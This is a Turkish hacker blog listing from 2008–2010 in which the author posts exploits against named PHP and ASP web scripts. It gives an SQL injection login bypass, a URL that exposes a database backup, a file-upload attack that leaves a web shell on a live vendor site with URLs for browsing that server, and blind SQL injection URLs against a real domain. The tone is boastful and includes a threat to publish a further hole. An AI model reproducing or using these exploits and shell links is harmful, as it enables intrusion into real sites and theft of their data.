php script etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
php script etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
23 Temmuz 2010 Cuma
haber scriptinde açık
biraz önce bi haber scriptinde açık buldum öyle direk gözle görülen bi acık değil video çekmeyi düşünüyodum ama vazgectim :(( hackhaber sitelerinde de mevcut açık :D tedbirinizi alın bakarsınız bir gün açığı yayınlarım ;)
9 Haziran 2009 Salı
Host Directory PRO 2.1.0 Remote Database Backup Vulnerability
kaynak: http://www.milw0rm.com/exploits/8877
kaynak: http://yildirimordulari.com/showthread.php?t=8550
script:
http://www.phphostdirectoryscript.com/
Bypass for demo:
username: demo ' or '
pass: ZoRLu or dont write anything
http://demo-host-directory-pro.phphostdirectoryscript.com/
Backup DB Disc. for demo:
http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db
kaynak: http://yildirimordulari.com/showthread.php?t=8550
script:
http://www.phphostdirectoryscript.com/
Bypass for demo:
username: demo ' or '
pass: ZoRLu or dont write anything
http://demo-host-directory-pro.phphostdirectoryscript.com/
Backup DB Disc. for demo:
http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db
22 Aralık 2008 Pazartesi
E-Learning Portal Remote File Upload
E-Learning Portal Remote File Upload
link 1: http://www.exploiter5.com/all.php?id=47
link 2: http://packetstormsecurity.org/0812-exploits/elearning-upload.txt
Discovered By: ZoRLu
exp:
http://www.preprojects.com/elearning/uploaded/your_shell.asp
you register to site
login this site
after upload you_shell.asp
exp for demo:
register:
http://www.preprojects.com/elearning/new_student.asp
login:
role: select STUDENT
user: zorlu
passwd: zorlu1
shell
http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )
server daki siteler:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git
buda golden gate:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM
18 Kasım 2008 Salı
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
Etiketler:
blind sql injection,
Jadu Galaxies,
php asp,
php script,
sql injection
Kaydol:
Kayıtlar (Atom)